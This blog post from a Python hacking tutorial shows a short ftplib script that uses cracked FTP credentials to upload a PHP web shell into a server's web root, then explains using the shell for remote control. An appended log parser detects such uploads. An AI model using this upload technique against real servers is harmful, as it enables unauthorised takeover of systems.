Wednesday, November 7, 2018

17. Python FTP Web Shell Attack


We have found the FTP login and web directory information. Now let’s log in over FTP and upload the Web Shell file. We also attempted a Web Shell attack in the Web Hacking chapter. Uploading a file through the web service itself is very difficult in a Web Shell attack, because the web server limits the formats and extensions of the files that can be uploaded. FTP, however, can upload files in a variety of formats directly. It is very easy to search for robust Web Shell files on the Internet. Let's use Google to download the Web Shell file from the site “https://code.google.com/p/webshell-php/downloads/detail?name=webshell.php”. If the link does not work, you can easily find another one with Google.

Figure 17-1 FTP Web Shell Attack

The “ftplib” module provides functions to transfer files and to change directories. The logic can be implemented in a few lines of code. Once the Web Shell file has been uploaded, the hacker can control the server PC remotely from any PC that is connected to the Internet.

from ftplib import FTP
apacheDir = "htdocs"
serverName = "server"
serverID = "server"
serverPW = "server"
ftp = FTP(serverName, serverID, serverPW)    #(1)
ftp.cwd("APM_Setup/htdocs")                  #(2)
fp = open("webshell.php","rb")               #(3)
ftp.storbinary("STOR webshell.php",fp)       #(4)
fp.close()
ftp.quit()

A file transfer can be completed in less than 10 lines of code. Python can be used to create a hacking program in a shorter period of time than Java or the C language. The detailed operation of the file transfer is as follows.

(1) FTP Login: The information that was obtained by hacking is used to log in to the server PC via FTP.

(2) Changing Directory: Move to the directory where the Web service is installed.

(3) Opening File: Open the php file where the Web Shell function is built-in.

(4) Transferring File: Upload the Web Shell file to the directory where the Web Services are installed on the server PC.

When the file transfer is complete, open the browser and run the Web Shell attack. Enter “http://server/webshell.php” into the address bar and you may see the following screen. You can change the directory, display the file list, and delete and execute files. It is also possible to upload your files directly from the screen, and you can try a variety of attacks.

Figure 17-2 FTP Web Shell Result

Let's summarize the hacking techniques that have been tested so far. Port scanning discovers the ports that are being serviced, so find a server that has an open FTP service and steal the password by using the Password Cracking technique. Identify the location of the web services by exploring the Directory Listing. Upload a Web Shell file to gain control of the server PC. By putting the above processes together, we can develop a program that can automatically return only vulnerable URLs.
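Seen from the server side, the upload in step (4) leaves a record in the FTP transfer log. The following is an added example, not code from the original post: it parses transfer-log lines and flags incoming transfers of server-executable files into the web root. It assumes the FTP server writes the common xferlog format; the extension list, the web root path (taken from the `ftp.cwd()` call above) and the sample log lines are constructed for illustration.

```python
import posixpath

# Extensions a typical Apache/PHP stack will execute (assumed list; tune per server).
EXEC_EXTS = {".php", ".phtml", ".php5", ".phar", ".jsp", ".asp", ".aspx", ".cgi"}
# Web root taken from the post's ftp.cwd() call; adjust to the real document root.
WEB_ROOTS = ("/APM_Setup/htdocs",)

def parse_xferlog(line):
    """Parse one xferlog-format line into a dict, or return None if malformed."""
    tok = line.split()
    if len(tok) < 18:
        return None
    # Five date tokens, then duration, host, size; the last nine fields are fixed,
    # so whatever is left in the middle is the filename (spaces included).
    _type, _flag, direction, _mode, user, _svc, _auth, _uid, status = tok[-9:]
    return {
        "time": " ".join(tok[0:5]),
        "host": tok[6],
        "size": int(tok[7]) if tok[7].isdigit() else -1,
        "path": posixpath.normpath(" ".join(tok[8:-9])),  # collapses "../" tricks
        "direction": direction,
        "user": user,
        "complete": status == "c",
    }

def suspicious_uploads(lines):
    """Return incoming transfers of executable files that land under a web root."""
    hits = []
    for line in lines:
        rec = parse_xferlog(line)
        if rec is None or rec["direction"] != "i":
            continue
        ext = posixpath.splitext(rec["path"])[1].lower()
        in_root = any(rec["path"].startswith(r + "/") for r in WEB_ROOTS)
        if ext in EXEC_EXTS and in_root:
            hits.append(rec)
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE = [
    "Wed Nov  7 10:14:40 2018 1 203.0.113.7 512 /APM_Setup/htdocs/logo.png b _ i r server ftp 0 * c",
    "Wed Nov  7 10:15:02 2018 1 203.0.113.7 2048 /APM_Setup/htdocs/webshell.php b _ i r server ftp 0 * c",
    "Wed Nov  7 10:16:11 2018 1 198.51.100.9 2048 /APM_Setup/htdocs/index.php b _ o r server ftp 0 * c",
    "Wed Nov  7 10:17:30 2018 1 203.0.113.7 90 /home/server/notes.php b _ i r server ftp 0 * c",
]

if __name__ == "__main__":
    for r in suspicious_uploads(SAMPLE):
        print(f'{r["time"]} {r["host"]} user={r["user"]} uploaded {r["path"]}')
```

Only the second sample line is flagged: the image upload, the download of index.php and the upload outside the web root are ignored.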

